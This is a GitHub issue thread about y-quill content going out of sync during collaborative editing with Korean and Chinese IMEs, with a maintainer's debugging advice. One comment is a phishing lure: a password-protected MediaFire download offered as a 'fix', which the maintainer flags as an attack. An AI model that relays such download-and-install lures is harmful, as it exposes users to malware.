### ISSUE TITLE
Content synchronization error when co-editing with Korean IME.

### ISSUE THREAD

**Issue by weiQuill** [yjs/y-quill#17]
> Please save me some time and use the following template. In 90% of all issues I can't reproduce the problem because I don't know what exactly you are doing, in which environment, or which y-* version is responsible. Just use the following template even if you think the problem is obvious.

**Checklist**

* [x] Are you reporting a bug? Use github issues for bug reports and feature requests. For general questions, please use https://discuss.yjs.dev/
* [ ] Try to report your issue in the correct repository. Yjs consists of many modules. When in doubt, report it to https://github.com/yjs/yjs/issues/

**Describe the bug**
I ran the y-quill demo locally and opened two windows to simulate different clients. When I used Korean IME to quickly type in one of the windows, and then clicked on a line in the other window and tried to continue typing there, the error occurred.

Since `y-webrt` didn’t work for me, I just replaced it with `y-websocket`. Same as the online demo.
![QQ_1724830583941](https://github.com/user-attachments/assets/0efd2aa8-7cf4-4e84-ade8-f69930229e60)

**To Reproduce**
1. Run y-quill demo locally.
2. Open the demo in 2 windows.
3. Switch to a Korean IME, I used 3-Set Korean.
4. Create some empty lines in the editor.
5. Focus into the first line of the editor in window A.
6. Press and hold `T` key.
7. Click into another line of the editor in window B.
8. Content synchronization error, the content on both sides is different.

**Expected behavior**
The content is synced correctly.

**Screenshots**

https://github.com/user-attachments/assets/8b2ebba8-9c7f-4d07-83ea-684eab5482fa

**Environment Information**
 - Browser / Node.js [e.g. Chrome, Firefox, Node.js]
 - Yjs version and the versions of the y-* modules you are using [e.g. yjs v13.0.1, y-webrtc v1.2.1]. Use `npm ls yjs` to find out the exact version you are using.

**Additional context**
BTW, this is also an issue that occurs when using Korean IME in my project, which is also a combination of quill+yjs.

* [ ] I'm a sponsor 💖
* [x] This issue is a blocker for my project.

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by weiQuill** [comment]
@ViniciusSCG Thanks for your quick reply, can you explain it more clearly?

**Comment by dmonad** [comment]
Hi @weiQuill 

The last comment was a phishing attack by a random user. I hope you didn't download anything.

These kinds of issues are extremely hard to debug for me. Are you saying that the demo (https://demos.yjs.dev/quill/quill.html) is working but the demo in this repository (`npm run demo`) is not?

If that's the case, then this might be an issue with the quill editor version.

To verify events that we receive from the quill editor, could you modify the source-code of y-quill and add this logging statement?

```js
   // line 104
    this._quillObserver = (eventType, delta, state, origin) => {
      console.log({ eventType, delta, state, origin }) // <--- add this line
     ...
```

It would really help me understand the problem. Thanks!

**Comment by weiQuill** [comment]
Yes, I didn't download those files, I was wary of downloading files, thanks for the heads up!

> These kinds of issues are extremely hard to debug for me. Are you saying that the demo ([demos.yjs.dev/quill/quill.html](https://demos.yjs.dev/quill/quill.html)) is working but the demo in this repository (npm run demo) is not?

Yes, I just run the demo on my local with `npm run start`, and noticed the issue when testing.
Then I try to reproduce the issue the online demo([demos.yjs.dev/quill/quill.html](https://demos.yjs.dev/quill/quill.html)), but it works fine there.

Thanks for pointing me in that direction, I'll give it a try!

**Comment by jimei416** [comment]
HI @dmonad 
I also encountered the same problem when using Chinese for collaborative editing.
There were no errors when running the [demo](https://github.com/yjs/yjs-demos/tree/main/quill) locally at first. But after changing the default version to the latest version
![image](https://github.com/user-attachments/assets/eb70c342-fc44-4522-a2b8-92d93798e407)
Entering Chinese characters will result in errors like @weiQuill , If you enter English, no text will appear.
